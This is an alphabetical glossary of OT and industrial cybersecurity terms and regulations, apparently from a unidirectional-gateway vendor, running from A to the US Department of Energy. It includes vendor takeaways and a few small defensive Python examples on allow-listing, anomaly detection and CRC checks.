OT Security Glossary
An alphabetical OT Security Glossary of common OT security industry terms and technical jargon that often gets thrown around and repeated, but not always explained.
This Cyber Security Glossary focuses on explaining words, concepts, acronyms, and other expressions that are geared toward OT security, as well as general cybersecurity that is used when securing critical infrastructures and industrial systems.
Administrative Privileges
An account or application with permission to change everything on a computer or device.
Advanced Persistent Threat (APT)
Also known as a targeted persistent attack. An attack by a persistent adversary, with a specific target, generally using interactive remote control techniques. Targeted attackers are unlikely to be distracted by other, less-well defended targets, contradicting the common wisdom “you only need to be better defended than your neighbor.”
Active Directory (AD)
A Microsoft product that manages passwords, security policies and other configurations for a network of computers.
Air Gap
An air gap, air wall, air gapping, or disconnected network is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from any other networks or external connections.
Allow-Listing Systems
What they are: Allow-listing systems intercept operating system functions that execute software, restricting execution to a list of “known good” allowed software.
Where to use: Allow-listing systems are recommended for all industrial systems that tolerate this kind of protection. Allow-listing systems are seen as better fits for most industrial environments than anti-virus systems for many reasons. Most allow-listing systems do not need the regular, resource-intensive, full filesystem scans that anti-virus systems need. Allow-listing systems prevent the execution of all known software, including new attack software the system has never before seen.
Intrinsic Limitations: All allow-listing systems are software, with vulnerabilities known and unknown that can be exploited. Allow-listing systems generally intercept and check the validity of software as it is loaded into memory for execution. As such, these systems tend to be blind to over-the-network in-memory attacks. These systems can also be blind to scripted malware arriving as text files and executed by interpreters that are allowed to execute because they are needed in parts of the automation system. Allow-listing systems are also vulnerable during software and security updates. During such updates, new software must be registered as “allowed.” Allow-listing systems are therefore vulnerable to attacks that masquerade malware as legitimate software during installation and update processes.
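The following Python sketch is an added example, not code from this glossary or from any allow-listing product. It enrols SHA-256 hashes of approved binaries, emulates the load-time check described above, and shows two of the limitations the entry lists: a changed binary fails the check, but a script handed to an approved interpreter passes it unexamined. The file paths and file contents are constructed samples.

```python
import hashlib

# Constructed sample "binaries": path -> file contents (not real software).
BINARIES = {
    "/opt/hmi/hmi_runtime": b"ELF\x01 hmi runtime v3.2 (constructed sample)",
    "/usr/bin/python3":     b"ELF\x01 cpython interpreter (constructed sample)",
    "/tmp/dropped_tool":    b"ELF\x01 unknown tool (constructed sample)",
}

SCRIPT_SUFFIXES = (".py", ".ps1", ".sh")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_allow_list(binaries, approved_paths):
    """Enrolment: record the hash of each approved binary as it is today."""
    return {path: sha256_hex(binaries[path]) for path in approved_paths}


def execution_decision(allow_list, binaries, path, argv):
    """Emulate the hook that runs when the OS is asked to load an executable.

    Returns (allowed, reason). The decision is made on the file being loaded;
    anything the program later reads from disk (a script, a config file) is
    invisible to this check, which is the interpreter blind spot from the entry.
    """
    if path not in allow_list:
        return False, "not on allow list"
    if sha256_hex(binaries.get(path, b"")) != allow_list[path]:
        return False, "hash mismatch (file changed since enrolment)"
    if any(arg.endswith(SCRIPT_SUFFIXES) for arg in argv[1:]):
        return True, "allowed interpreter; script argument NOT inspected"
    return True, "hash matches"


def tampered_copy(binaries, path, new_contents):
    """Helper for the demo: return a copy of the file table with one file replaced."""
    copy = dict(binaries)
    copy[path] = new_contents
    return copy


if __name__ == "__main__":
    allow = build_allow_list(BINARIES, ["/opt/hmi/hmi_runtime", "/usr/bin/python3"])
    print(execution_decision(allow, BINARIES, "/opt/hmi/hmi_runtime", ["hmi_runtime"]))
    print(execution_decision(allow, BINARIES, "/tmp/dropped_tool", ["dropped_tool"]))
    print(execution_decision(allow, BINARIES, "/usr/bin/python3", ["python3", "/tmp/x.py"]))
```

The last case is the one to design around: the check says "allowed" because the interpreter is enrolled, so a site that must keep an interpreter on the allow list needs a separate control (restricted script directories, signed scripts, or interpreter constraints) that this hook cannot provide.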
American Standard Code for Information Interchange (ASCII)
A character encoding standard for electronic communication. ASCII codes represent text in computers, telecommunications equipment, and other devices. ASCII has just 128 code points, of which only 95 are printable characters, which severely limit its scope. The set of available punctuation had significant impact on the syntax of computer languages and text markup. ASCII hugely influenced the design of character sets used by modern computers, including Unicode which has over a million code points, but the first 128 of these are the same as ASCII.
Analog
The opposite of digital – for example, mechanical or electrical switches, gauges and dials.
Anomaly-based Intrusion-Detection System
An intrusion-detection system (IDS) that in some sense learns what “normal” behavior is for a computer, network or other system, and raises alerts when the system behaves outside of these learned, normal bounds. Limitations: Most intrusion-detection systems are software, and contain vulnerabilities that may be exploited. In addition, most anomaly-based systems learn that normal system behavior is a range of measured values, such as network usage or memory usage. The most common attack on anomaly-based intrusion-detection systems is a “slow” attack, one that changes learned values only slightly, staying within the limits the anomaly-based system has learned are normal.
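To show what “learned normal bounds” and a “slow” attack look like in practice, here is an added Python example (not from this glossary or any IDS product). It learns a band of mean ± 3 standard deviations from a constructed sample of packet-rate readings, flags readings outside the band, and contrasts a fixed baseline with the continuously re-learned baseline many products use, where a gradual ramp drags the band along and never alerts.

```python
import statistics

# Constructed sample: packets per second on a control network during 20 quiet minutes.
NORMAL_RATES = [100, 104, 98, 101, 99, 103, 97, 102, 100, 101,
                99, 98, 103, 102, 100, 101, 97, 99, 104, 100]

# Constructed test traces.
SUDDEN_ATTACK = [101, 100, 150, 99]                 # a burst 50% above normal
SLOW_ATTACK = [101, 102, 103, 104, 105, 106, 107, 108]  # one packet/s more each minute


def learn_baseline(samples, k=3.0):
    """Learn 'normal' as the band mean - k*sd .. mean + k*sd."""
    mean = statistics.mean(samples)
    sd = statistics.pstdev(samples)
    return (mean - k * sd, mean + k * sd)


def detect(baseline, observations):
    """Fixed-baseline detector: indices of observations outside the band."""
    lo, hi = baseline
    return [i for i, v in enumerate(observations) if v < lo or v > hi]


def detect_with_relearning(samples, observations, k=3.0, window=20):
    """Re-learn the band from the most recent `window` readings after every
    observation. Each small step of a slow attack becomes part of 'normal'."""
    history = list(samples)
    alerts = []
    for i, v in enumerate(observations):
        lo, hi = learn_baseline(history[-window:], k)
        if v < lo or v > hi:
            alerts.append(i)
        history.append(v)
    return alerts


if __name__ == "__main__":
    band = learn_baseline(NORMAL_RATES)
    print("learned band:", band)
    print("fixed baseline, sudden attack:", detect(band, SUDDEN_ATTACK))
    print("fixed baseline, slow attack:  ", detect(band, SLOW_ATTACK))
    print("re-learning,    slow attack:  ", detect_with_relearning(NORMAL_RATES, SLOW_ATTACK))
```

With the constructed data the band is roughly 94 to 107 packets/s: the burst is caught immediately, the fixed baseline catches the slow ramp only once it exceeds 107, and the re-learning detector never catches it. That gap is the reason anomaly detection is paired with fixed limits, signatures, or unidirectional boundaries rather than used alone.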
Anti-Virus Systems
What they are: Anti-virus systems are Host IDS systems with extra functionality to prevent writing malware to disk, loading malware from disk, executing malware or otherwise interrupt attacks in progress, hopefully before those attacks cause unacceptable consequences.
Where to use: Anti-virus systems are recommended for all industrial systems that tolerate or support these systems. Like Host IDS systems, however, many industrial devices do not support the installation of third-party software such as anti-virus systems or come with a built-in anti-virus system and support only that one. Many industrial systems cannot tolerate full filesystem scans and may not have been tested for safe and reliable operation with anti-virus functions intercepting system functions to understand what the protected host is doing that might be suspicious.
Intrinsic Limitations: All anti-virus systems are software, with vulnerabilities known and unknown that can be exploited. Signature-based anti-virus can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based anti-virus can detect attacks that “look” suspicious with respect to the characteristics the built-in host IDS function is monitoring / learning. A big risk for anti-virus systems is false alarms – if a defective signature file is loaded into an anti-virus system, that system risks quarantining or otherwise interrupting the correct function of legitimate automation and operating system software.
Annual Loss Expectancy (ALE)
The average loss we can expect from a risk in a one-year timeframe and is calculated by multiplying SLE by ARO.
ANSSI - Agence nationale de la sécurité des systèmes d'information.
The French national authority for cyber defense and network information security.
Application Control (AC)
A security technology that maintains a list of applications and libraries that are permitted to execute on a particular computer, and takes measures to block execution of unapproved code. Limitations: Application control systems are software and contain vulnerabilities that may be exploited. In addition, application control systems are unable to prevent execution of many scripted attacks, and can be vulnerable to software update attacks. Specifically, all application control systems must have some way to update the list of allowed executables when software version updates and security updates are applied. When an attacker can embed malware in what otherwise appears to be a legitimate update, the application control system will add that malware to the list of allowed executables.
Application Programming Interface (API)
A way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system’s user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system’s capabilities.
Application specific integrated circuit (ASIC)
An integrated circuit (IC) chip customized for a particular use, rather than intended for general-purpose use, such as a chip designed to run in a digital voice recorder or a high-efficiency video codec.
APT1
The Military Unit Cover Designator (MUCD) of a People’s Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks. The unit is stationed in Pudong, Shanghai, and has been cited by US intelligence agencies since 2002.
APTA (USA Guidance)
What is it: Securing Control and Communications Systems in Rail Transit Environments – Part II Defining a Security Zone Architecture for Rail Transit and Protecting Critical Zones – This document presents Defense-in-Depth as recommended practice for securing railway control systems. It is the second part of a series of documents to be released presenting the importance of control and communication in transit systems and defines a minimum set of security controls for the most critical zones, the safety-critical security zone (SCSZ) and the fire, life-safety security zone (FLSZ). The intent of this document is to provide guidance to transit agencies on securing control and communications systems for their rail networks. The Enterprise Cybersecurity Work Group develops APTA standards pertaining to mass transit cybersecurity. Specifically, it provides strategic recommendations for Chief Information Officers and decision makers regarding business cybersecurity, information systems, fare collection and general cybersecurity technologies.
Relevancy to Unidirectional Gateways: The document outlines the fundamental differences in approach to protecting a business information system compared with an industrial control system and describes the different impacts and objectives of each. However it does not make the distinction that these disparate systems require different technology and solutions.
Waterfall Takeaway: For the rail industry, perhaps the UK will be leading the charge for the most sophisticated cyber security guidance. This document unfortunately leverages the traditional IT Defense-in-Depth model and applies it to the control and communications industrial systems of rail and transit environments; such a model leaves these environments vulnerable and prone to cyber breach.
Source: APTA
Artificial Intelligence (AI)
The theory and development of computer systems able to perform tasks normally requiring human intelligence, such as visual perception, speech recognition, decision-making, and translation between languages.
ASD/ACSC Information Security Manual - Guidelines for Gateways (Australian Guidance)
What is it: Information Security Manual – Guidelines for Gateways – Gateways are critical for an organisation to reduce the security risks associated with providing external parties with access to their networks. In doing so, it is important that gateways are used not only between an organisation’s networks and public network infrastructure, but also between an organisation’s networks that belong to different security domains and between an organisation’s networks and other organisations’ networks that are connected via means other than public network infrastructure.
Relevancy to Unidirectional Gateways: The entire document discusses all the different use cases and controls applicable to unidirectional gateway deployment: cross domain, separation of data flows, event logging, etc.
Waterfall Takeaway: This is a security manual for the deployment and best usage of unidirectional gateways in critical infrastructure. It was published in 2023, and used to be confined to guidance within the defense sector. Now the Cyber Bodies are recommending the usage of unidirectional gateways in critical networks.
Source: CISC
ASD/ACSC Implementing Network Segmentation and Segregation (Australian Guidance)
What is it: This document intends to assist staff responsible for an organisation’s network architecture and design to increase the security posture of their networks by applying network segmentation and segregation strategies.
Relevancy to Unidirectional Gateways: This document is not specifically targeting an ICS/OT audience, however the topic of network segmentation is directly applicable to critical network protection. One of the technologies recommended to Implement at demilitarized zones and between networks with different security requirements is a data diode.
Waterfall Takeaway: A quick 6-page reference guide on how to protect trusted zones from untrusted zones; Waterfall’s technology is mentioned as a good solution.
AVEVA PI
AVEVA PI is a data management system that collects, stores, and visualizes real-time data for industrial operations.
AWWA Cybersecurity Guidance (Guidance)
What is it: AWWA advocates for a regulatory model for the Water sector, similar to that of the Energy sector.
Relevancy to Unidirectional Gateways: Potentially relevant as it provides cybersecurity risk management guidance for water systems, which may involve unidirectional gateways.
Source: AWWA
Biometric
BIOS
Basic Input and Output System – a set of computer instructions in firmware which control input and output operations.
Bit (Binary Digit)
The smallest unit of data that a computer can process and store, always equal to a “1” or a “0” value. A bit is always in one of two physical states, similar to an on/off light switch. The state is represented by a single binary value, usually a 0 or 1. However, the state might also be represented by yes/no, on/off or true/false.
BlackEnergy
BlackEnergy Malware was first reported in 2007 as an HTTP-based toolkit that generated bots to execute distributed denial of service attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS. In 2014, BlackEnergy 3 came equipped with a variety of plug-ins.
BLOB (Binary Large Object)
A Binary Large Object (blob) is a collection of data of an arbitrary size. Blobs do not have to follow a given format or have any metadata associated with them. They are a series of bytes, with each byte made up of 8 bits (a 1 or a 0, hence the “binary” descriptor).
Botnet
A collection of compromised computers under the remote control of a central computer or computers.
Breach
Also known as data leakage, is “the unauthorized exposure, disclosure, or loss of operational, personal or proprietary information”. Attackers have a variety of motives, from financial gain to political activism, political repression, and espionage.
BSEE Well Control Rule (Regulation, USA)
What is it: The final rule for Oil & Gas and Sulfur Operations in the Outer Continental Shelf (United States). The Well Control Rule became law on April 14, 2016, when the BSEE announced the release of the Blowout Preventer Systems and Well Control rule (Final Rule). The final Well Control Rule results in one of the most significant safety and environmental protection reforms the Department of Interior has undertaken – its purpose is to reduce the risk of an offshore oil or gas blowout that could result in the loss of life, serious injuries or substantial harm to the environment through modernizing and strengthening offshore energy standards.
Real Time Monitoring (RTM) of data in final rule (§ 250.724) requires operators to gather and monitor real-time well data using an independent, automatic, and continuous monitoring system capable of recording, storing, and transmitting data regarding the BOP control system, the well’s fluid handling system on the rig, and the well’s downhole conditions with the bottom hole assembly tools. These data must be transmitted as they are gathered (barring any unforeseen interruptions) and have the capability to monitor the data onshore, using qualified personnel, in accordance with a real-time monitoring plan.
This plan requires real-time monitoring capabilities, data transmission onshore during operations, data storage, procedures for providing BSEE access, procedures for communication between rig personnel and the onshore monitoring personnel, and actions to be taken if you lose any real-time monitoring capabilities or communications between rig and onshore personnel and how BSEE is to be notified.
Relevancy to Unidirectional Gateways: The requirement of real time data monitoring makes connecting ICS and business networks unavoidable. Oil companies will need to consider a new host of vulnerabilities and risks associated with connecting drilling rig industrial control systems to outside data centers in real time. This scenario makes unidirectional gateways all the more relevant when meeting data requirements of the Well Control Rule.
Waterfall Takeaway: Due to recent cyber attacks in the maritime industry, cyber security is quickly becoming front of mind for many operators, and new drilling rigs are already being built pursuant to the updated BSEE industry standards. People working in the offshore energy industry have expressed real concern that real-time monitoring could introduce cybersecurity threats that put critical safety systems at risk of failure.
Source: gpo.gov (PDF)
BSI
Bundesamt für Sicherheit in der Informationstechnik – the Federal Office for Information Security in Germany
Buffer Overflow
An attack where larger-than-expected messages or message fields are sent to a computer. The computer software mistakenly writes the too-large data into memory, over-writing memory areas adjacent to the memory intended to store the data. Done carefully, this kind of attack can result in the target computer executing instructions in the attack itself, which is generally the first step in causing the compromised computer to download remote access type malware.
Bulk Electric System (BES)
The electrical generation resources, transmission lines, interconnections with neighboring systems, and associated equipment, generally operated at voltages of 100 kV or higher. BES is a legally-defined term used in NERC CIP standards (regulations).
C (Programming Language)
A general-purpose programming language (GPL) developed by Dennis Ritchie at Bell Laboratories in 1972. By design, C’s features cleanly reflect the capabilities of the targeted CPUs. It has found lasting use in operating systems code (especially in kernels), device drivers, and protocol stacks, but its use in application software has been decreasing. C is commonly used on computer architectures that range from the largest supercomputers to the smallest microcontrollers and embedded systems.
C2M2
From the US Department of Energy: The Cybersecurity Capability Maturity Model (C2M2) is a free tool to help organizations evaluate their cybersecurity capabilities and optimize security investments. It uses a set of industry-vetted cybersecurity practices focused on both information technology (IT) and operations technology (OT) assets and environments.
Centrifuge
A machine with a rapidly rotating container that applies centrifugal force to its contents, typically to separate fluids of different densities (e.g. cream from milk) or liquids from solids.
Chip
Also called a microchip, a computer chip, an integrated circuit or IC. It consists of a set of electronic circuits on a small flat piece of silicon. On the chip, transistors act as miniature electrical switches that can turn a current on or off.
CSA Group - Cyber security for nuclear power plants and small reactor facilities (Canadian Standard)
What is it: Cyber security for nuclear power plants and small reactor facilities – This new standard N290.7-14 “Cyber security for nuclear power plants and small reactor facilities”, requires the use of unidirectional gateways to protect the most safety critical CEAs (Cyber Essential Assets). Its objective, “to secure essential computer systems and components against cyber-attacks”, will require the implementation of unidirectional technology to all routable communication paths on the perimeter of CEAs of highest safety significance.
Relevancy to Unidirectional Gateways: The standard breaks down categories of CEAs by security significance in accordance with the most important safety or security function a CEA performs. It takes a preventative posture by allowing only one way to secure the most important CEAs from less-important networks of CEAs: hardware-enforced unidirectional gateways. The language contained in the regulation makes it clear that for the most important CEAs, insecure or unauthorized connections, unauthorized information flows, and remote deactivation and activation of services must be prevented.
Waterfall Takeaway: Generally speaking, nuclear sites face unique risks. However, when it comes to protecting control networks and critical infrastructure from cyber attacks, nuclear is no different from other industrial networks – nuclear is just leading the charge. In 2010, the Nuclear Regulatory Commission (NRC) in the US, effectively forbade the use of firewalls to protect nuclear generator control networks from a less-trusted network. As a result, all American nuclear generators deployed unidirectional gateway technology. With Canada following the US regulator’s lead, control system security standards throughout the North American nuclear industry now recognize the preventative strength of Unidirectional Security Gateways.
Source: CCOHS
CIGRE (Framework by EU)
What is it: Framework for EPU operators to manage the response to a cyber-initiated threat to their critical infrastructure. (2017) 76-page document: This technical brochure describes a framework for a tool set that electric public utility (EPU) operators can use to automate their response to cyber-initiated threats. Within this framework, priority is placed on the capability for EPU personnel and supporting contractors to create, model, simulate, and control the response to a cyber threat. The three pillars of model-based system engineering (MBSE) are tailored for EPU applications to establish a coherent framework. CIGRE, based in Paris, France, stands for International Council on Large Electric Systems – Conseil international des grands réseaux électriques.
Relevancy to Unidirectional Gateways: Unidirectional gateways are mentioned about a dozen times, and data diodes several times. Andrew is quoted in the document, as WF made significant contributions to the draft. Under section 2.3.4 Protection against high networks, there is a deep dive into the physical inner-workings of UGWs. The authors make the case that UGWs are more secure than firewalls. Section 2.3.5 also delves into UGWs in relation to TCP/IP protocols, and draws distinction between UGWs and data diodes.
Waterfall Takeaway: Interesting how unidirectional technology is featured in a technical brochure for this European power council. Overall, this is a very comprehensive framework which references the NIST cybersecurity framework several times.
Please note that only CIGRE members have free access to the document, everyone else must pay 180 euros.
Circuit-level Gateway
Type of firewall or network security device that operates at the session layer (Layer 5) of the OSI model. It works by monitoring and controlling network traffic based on the transmission control protocol (TCP) handshaking process without inspecting the actual contents of the data packets.
CISA Top Cyber Actions for Securing Water Systems (Alert)
What is it: Joint fact sheet by CISA, EPA, and FBI.
Relevancy to Unidirectional Gateways: Potentially relevant as it outlines actions to reduce cyber risks in water systems, which could involve unidirectional gateways.
Source: CISA.gov
Cloud Computing
The practice of using a network of remote servers hosted on the internet to store, manage, and process data, rather than a local server or a personal computer.
Command and Control
Command and Control, commonly known as C2 or C&C, is one of the most destructive attacks. The Command and Control Infrastructure is crucial to attackers, and a potential vulnerability for defenders. Blocking C&C communications or destroying the C&C infrastructure of an enemy stops a cyberattack in its tracks.
Compromised
Any computer, connected device, or other electronic asset doing our enemy’s bidding in addition to or instead of our own.
Conduit
Consists of the grouping of cyber assets dedicated exclusively to communications, and which share the same cybersecurity requirements. When modeling zones and conduits, there are a series of important rules that professionals must take into account.
Confidentiality
Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information.
Connector
A software component that enables two applications or services to communicate with each other.
Consequence
An effect associated with an event or condition, usually allowed, facilitated, caused, prevented or changed.
Control System
A control system manages, commands, directs, or regulates the behavior of other devices or systems using control loops. Control systems are designed via a control engineering process.
Countermeasures
An action, device, procedure, or technique that reduces a threat, vulnerability, or attack, eliminating or preventing it by minimizing the harm it can cause.
CPNI
Customer proprietary network information is subscriber data acquired by telecommunications providers.
CPU
A central processing unit (CPU), also called a central processor, main processor, or just processor, is the most important processor in a given computer.
CRA - Cyber Resilience Act (Regulation)
What is it: Sets cybersecurity standards for digital products in the EU.
Relevancy to Unidirectional Gateways: Potentially relevant as it aims to ensure cybersecurity of digital products, which may include unidirectional gateways.
Source: European Commission
CRC
Cyclic redundancy check is an error-detecting code commonly used in digital networks and storage devices to detect accidental changes to digital data.
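As an added example (not code from this glossary), the Python below implements the common CRC-32 used by Ethernet frames, zip and PNG, appends it to a constructed sample message, and shows that a single flipped bit is caught on receipt. It also puts a keyed HMAC beside it, because a CRC detects only accidental changes: anyone who can alter the data can recompute the CRC, so an integrity check against deliberate tampering needs a key. The sample payload and key are constructed and have no special meaning.

```python
import hmac
import zlib

CRC32_POLY = 0xEDB88320  # reflected form of the IEEE 802.3 polynomial


def crc32_bitwise(data: bytes) -> int:
    """Bit-serial CRC-32 (init 0xFFFFFFFF, reflected, final XOR), one bit at a time."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ CRC32_POLY
            else:
                crc >>= 1
    return crc ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Cross-check the hand-rolled CRC against the standard library."""
    return crc32_bitwise(data) == zlib.crc32(data)


def append_crc(payload: bytes) -> bytes:
    """Frame = payload followed by its CRC-32, little-endian as zip stores it."""
    return payload + crc32_bitwise(payload).to_bytes(4, "little")


def crc_ok(frame: bytes) -> bool:
    """Receiver side: recompute over the payload and compare with the trailer."""
    payload, stored = frame[:-4], int.from_bytes(frame[-4:], "little")
    return crc32_bitwise(payload) == stored


def flip_bit(frame: bytes, bit_index: int) -> bytes:
    """Simulate a transmission error by flipping one bit of the frame."""
    buf = bytearray(frame)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


def hmac_tag(key: bytes, payload: bytes) -> bytes:
    """Keyed integrity tag: the check to use when changes may be deliberate."""
    return hmac.new(key, payload, "sha256").digest()


def hmac_ok(key: bytes, payload: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(hmac_tag(key, payload), tag)


# Constructed sample: a six-byte register-write style message, purely illustrative.
SAMPLE = b"\x01\x06\x00\x10\x00\x2a"
SAMPLE_KEY = b"constructed-demo-key"  # a real deployment provisions this out of band

if __name__ == "__main__":
    frame = append_crc(SAMPLE)
    print("crc32 of check string:", hex(crc32_bitwise(b"123456789")))
    print("intact frame ok:", crc_ok(frame))
    print("bit-flipped frame ok:", crc_ok(flip_bit(frame, 13)))
    tag = hmac_tag(SAMPLE_KEY, SAMPLE)
    print("hmac on intact payload:", hmac_ok(SAMPLE_KEY, SAMPLE, tag))
    print("hmac on altered payload:", hmac_ok(SAMPLE_KEY, SAMPLE[:-1] + b"\x2b", tag))
```

The value 0xCBF43926 for the input "123456789" is the published check value for this CRC-32 variant, which is the quickest way to confirm an implementation. Note that `crc_ok` alone tells a receiver nothing about who produced the frame, which is why protocol security layers add a MAC or signature rather than relying on the link-layer CRC.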
Criticality Boundary
A network boundary whereby the consequences of compromise go from acceptable to unacceptable.
CRT
CREST Penetration Tester: Assesses operating systems and common network services.
Cryptography
Cryptography is the technique of obfuscating or coding data, ensuring that only the person who is meant to see the information–and has the key to break the code–can read it.
CSB
The US Chemical Safety and Hazard Investigation Board
CSF
Cyber Security Framework
CSO
Chief Security Officer – an executive responsible for the safety and security of company data, personnel, and assets. CSOs are responsible for preventing data breaches, phishing, and malware, by developing robust safety protocols and crisis management.
CSV
One of the core purposes of Continuous Security Validation (CSV) is to ensure that the security controls are configured as hermetically as possible to confirm that it is both preventing unwanted intrusions and enabling unfettered operations.
Not to be confused with Comma Separated Values (.csv) which is a type of spreadsheet file that uses plaintext ASCII characters.
CTO
Chief Technology Officer – a senior executive responsible for an organization’s technology strategy and the development and implementation of new technology initiatives. The CTO is responsible for ensuring that the company’s technology infrastructure is aligned with its overall business goals and objectives.
Current Loop
In electrical signalling, an analog current loop is used where a device must be monitored or controlled remotely over a pair of conductors.
Cyber
Relating to or characteristic of the culture of computers, information technology, and virtual reality.
Cyberattack
A cyberattack is any intentional effort to steal, expose, alter, disable, or destroy data, applications, or other assets through unauthorized access.
Cyber Cell
A cyber cell could be defined as a capability of high functional specialisation and of a dual nature, both defensive and offensive. Its function is to carry out a task with the goal of guaranteeing the security and defence of a specific area of cyber space.
Cyber Defense
Cyber defense is a coordinated act of resistance that guards information, systems, and networks from cyber attacks by implementing protective procedures such as firewalls, network detection and response (NDR), endpoint detection and response (EDR) to identify, analyze, and report incidents that occur within a network.
Cyber Espionage
The use of computer networks to gain illicit access to confidential information, typically that held by a government or other organization.
Cyber Informed Engineering (CIE)
Cyber-Informed Engineering (CIE) is a strategic initiative championed by Idaho National Laboratory (INL) to integrate cybersecurity into engineering practices for critical infrastructure.
Cyber Resilience in Oil and Gas (International Initiative)
What is it: International initiative that aims to improve cyber resiliency across the Oil & Gas industry.
Relevancy to Unidirectional Gateways: Indirectly relevant as it highlights the need for robust cybersecurity practices, which could include unidirectional gateways.
Source: World Economic Forum
Cybersecurity
Cybersecurity is the application of technologies, processes, and controls to protect systems, networks, programs, devices and data from cyber attacks.
Cybersecurity for Industrial Control Systems (Regulation, France)
What is it: The purpose of the guide is to assess the cybersecurity of industrial control systems. Although specific to each facility, ICSs are in most cases made up of the following components: Programmable Logic Controllers (PLC); Distributed Control Systems (DCS); Safety Instrumented Systems (SIS); Sensors and actuators (intelligent or non-intelligent); Fieldbus; Supervisory control software: SCADA; Manufacturing execution system (MES); Engineering and maintenance software; Embedded systems.
Relevancy to Unidirectional Gateways: Highlights the essential role that Unidirectional Gateways play in protecting important industrial control and critical infrastructure information systems from less-trusted networks. This regulation forbids the use of Firewalls between the most critical industrial networks and less trusted networks. Here, they recommend unidirectional perimeter technology.
Waterfall Takeaway: This regulation highlights the essential role that Unidirectional Gateways play in protecting important industrial control and critical infrastructure information systems from less-trusted networks. The ANSSI guidance permits firewalls to be used to protect the least-critical control-system networks, and to provide internal segmentation within critical control-system networks. The guidance, however, forbids only firewall-class protections at the boundaries between the most critical networks and any less-critical, or less-trusted networks. For example, in most organizations with physical, industrial infrastructures, safety and control systems for those infrastructures would be classified as most critical, whereas all IT networks are by definition the least trusted networks.
Source: cyber.gov.fr
Cybersecurity Lifecycle
The cybersecurity lifecycle refers to the continuous process of managing and protecting an organization’s information systems and data from cyber threats. It involves the identification, protection, detection, response, and recovery stages to ensure effective cybersecurity measures.
Cybersecurity Resources for Manufacturers (Resource)
What is it: NIST-provided resources to defend US-owned assets from cyber threats.
Relevancy to Unidirectional Gateways: Indirectly relevant as it offers resources to protect manufacturing operations, potentially including unidirectional gateways.
Source: NIST
Data Diodes
What they are: The US NIST glossary defines data diodes as hardware that is physically able to send information in only one direction. If you Google “data diode” you will find close to 100 vendors world-wide, with each vendor selling their product to their local government. Data diodes are used routinely to send data into classified government and military networks with no ability to leak national secrets data back into unclassified networks or the Internet.
Where to use: Data diodes are recommended at consequence boundaries that connect classified government or military networks where worst-case consequences of data theft are unacceptable, to unclassified networks.
Intrinsic Limitations: Good data diodes deterministically control the flow of network packets and network information – diodes do nothing about potentially contaminated USB drives or laptops, or cell phones being carried into OT networks. Data diodes are hardware-intensive solutions. Most diode vendors provide little or no software to go with their products, preferring to develop any needed software on a custom engineering basis for their government and military customers. What little software diode vendors do provide tends to have low sales volumes, which means the vendors are not able to invest in features such as web-based or graphical user interfaces. When diode vendors provide software with their products, that software – like any software – has vulnerabilities that can be exploited. On the other hand, even if such vulnerabilities are exploited, the hardware in true data diodes is still physically incapable of leaking government secrets.
Data Exfiltration
Unauthorized movement of data from a protected network to an external destination.
Deep Packet Inspection
A feature within modern firewalls that supports firewall rules applied to the contents of data packets for a wide variety of IT protocols, providing an IT analogue of unidirectional application data control.
Demilitarized Zone (DMZ)
A demilitarized zone is a network that protects an organization’s internal network from untrusted traffic by acting as a buffer between the two. A DMZ’s purpose is to allow an organization to access untrusted networks, like the internet, while keeping its internal network secure.
United States Department of Defense (DoD)
The Department of Defense (DoD) is a U.S. federal agency responsible for overseeing the nation’s armed forces and ensuring national security through military power. It is the largest employer in the United States and operates globally to safeguard U.S. interests. The DoD’s key roles include:
DoD Primary Responsibilities
- National Defense: Protecting the U.S. against external threats through military readiness.
- Military Operations: Conducting operations ranging from combat missions to humanitarian aid.
- Strategic Deterrence: Ensuring security through nuclear and conventional forces.
- Cyber Defense: Protecting the nation’s cyber infrastructure.
Key Components of DoD:
- Armed Services:
  - Army: Land-based military operations.
  - Navy: Maritime defense and operations.
  - Air Force: Air and space superiority.
  - Marine Corps: Rapid response and amphibious warfare.
  - Space Force: Operations in space, established in 2019.
- Joint Chiefs of Staff (JCS): Senior military leaders advising the President and Secretary of Defense.
- Unified Combatant Commands: Regional or functional military commands (e.g., U.S. Central Command, U.S. Cyber Command).
DoD Supporting Agencies:
- Defense Intelligence Agency (DIA): Military intelligence and analysis.
- National Security Agency (NSA): Signals intelligence and cybersecurity.
- Defense Advanced Research Projects Agency (DARPA): Cutting-edge military technology research.
Headquarters of DoD
The DoD is headquartered at the Pentagon in Arlington, Virginia. It is led by the Secretary of Defense, a civilian appointed by the President, who works alongside military leaders to shape defense policies and strategies.
The DoD plays a critical role in maintaining global stability and U.S. national interests, both at home and abroad.
United States Department of Energy (DoE)
The Department of Energy (DOE) is a U.S. federal agency responsible for managing the nation’s energy resources, advancing scientific research, ensuring energy security, overseeing nuclear safety, and addressing cybersecurity challenges within the energy sector. Established in 1977, the DOE plays a critical role in energy innovation, environmental stewardship, and securing critical infrastructure.
Primary Responsibilities of DOE
Energy Policy and Security:
- Ensuring a reliable, affordable, and sustainable energy supply.
- Reducing dependence on foreign energy sources.
- Promoting renewable energy technologies (e.g., solar, wind, geothermal).
Cybersecurity in Energy:
- Protecting the U.S. energy grid and critical infrastructure from cyber threats.
- Coordinating with other federal agencies and private sectors to mitigate cyber risks to energy systems.
- Developing and deploying advanced cybersecurity tools and technologies.
- Leading initiatives to enhance resilience against cyberattacks on industrial control systems (ICS) and operational technologies (OT).
Scientific Research:
- Funding and conducting research in areas like quantum computing and cybersecurity for energy systems.
- Managing 17 national laboratories, such as Sandia and Lawrence Livermore, which conduct cybersecurity research.
Nuclear Safety and Security:
- Maintaining and modernizing the U.S. nuclear weapons stockpile.
